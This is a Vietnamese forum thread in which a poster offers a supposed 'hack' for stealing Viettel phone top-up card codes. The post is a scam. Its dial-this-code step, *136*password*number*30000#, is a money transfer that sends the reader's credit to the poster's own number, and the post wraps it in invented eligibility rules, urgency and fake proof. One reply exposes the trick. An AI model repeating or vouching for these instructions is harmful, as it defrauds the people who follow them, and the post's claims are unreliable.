Phần mềm hữu ích với Internet
By tigontt2003
#569756
HACK THE NAP VIETTEL

Xin duoc chia sẻ voi cac bạn 1 thu thuat đánh cắp ma so thẻ cào mạng VIETTEL. Toi moi nghiên cứu ra, và dang thuc hiện thành công 100%


Nếu cac ban làm dung ca bước sau ma van không được thi co thể gặp truc tiep tui tại so nha 31 Nguyễn Chi Thanh-Dong Đa-Hà Nội, gap Thu Hằng


Đây la hinh ảnh số tien toi Hack được cua VIETTEL


Hinh anh tin nhắn the cao đã được sử dụng, cac ban đừng nạp thử.


Điều kiện: Bạn phai co 1 sim tra truoc hay trả sau cua VIETTEL - So du TK (Chính hay phụ) Trên > 32.198VND - Sim da hoạt dong tren 15 tháng (450 ngày) .


Với những sim hoat động trên 450 ngay mới duoc VIETTEL đưa thue bao đó vào danh sach hệ thống thue bao tín nhiệm va dc bảo vệ boi nha mạng.


Bước 1: Bạn soan tin nhắn với cú pháp: MK roi gửi đến 136, để lay mat khẩu, vì sao ? don giản vì ta Hack qua dich vụ I-SHARE của VIETTEL.

Chú ý: Ban nao đã có mat khau thì bỏ qua buoc này.


Bước 2: bạn thoat ra ngoài màn hinh va soạn cú pháp: *13 6*MK*008-497-65 81-715*30000# roi nhan phím gọi di va ấn phím tat ngay lập tức.


Sau khi thuc hien cú pháp trên, ban nhan được 1 tin nhan từ tong dai +198 với menh gia thẻ cào duoc lua chọn ngẫu nhiên.Lưu ý: 1. Mệnh gia the được tong dai +198 gui den bạn qua tin nhan SMS có gia tri như các menh gia được VIETTEL cung cap trên thị trường.


2. De an toàn cho chung toi cũng như su ton tại lâu dai cua máy chủ server rieng - may chu chỉ chap nhan 1 lần giao dich đối với tung so đt


Nhanh chan len bạn. chúc ban nhan được the cao với menh gia cao nhất!


các bạn hay mau lên đi keo VIETTEL biết sửa loi la không Hack duoc nữa đâu nha.

Mọi thắc mắc, yêu cau ve bất cứ van de gì mời ban gui về họp thư

email: [email protected]

Chúc cac ban thành công.


By matdang81
#569761 Ai test chua vậy, Cho y kien cái đi, Nhung tai sao lại phai co 32k trong tai khoan hả bạn?
By nangthuytinh_089
#569766 vâng , voi cú pháp tren ban đã chuyển 30k cho thue bao 0976581715

Các ban khong để ý day la cú pháp chuyen tien à : *136*mat khau*so đt người nhan*so tien#
Kết nối đề xuất:
Tìm tài liệu
Advertisement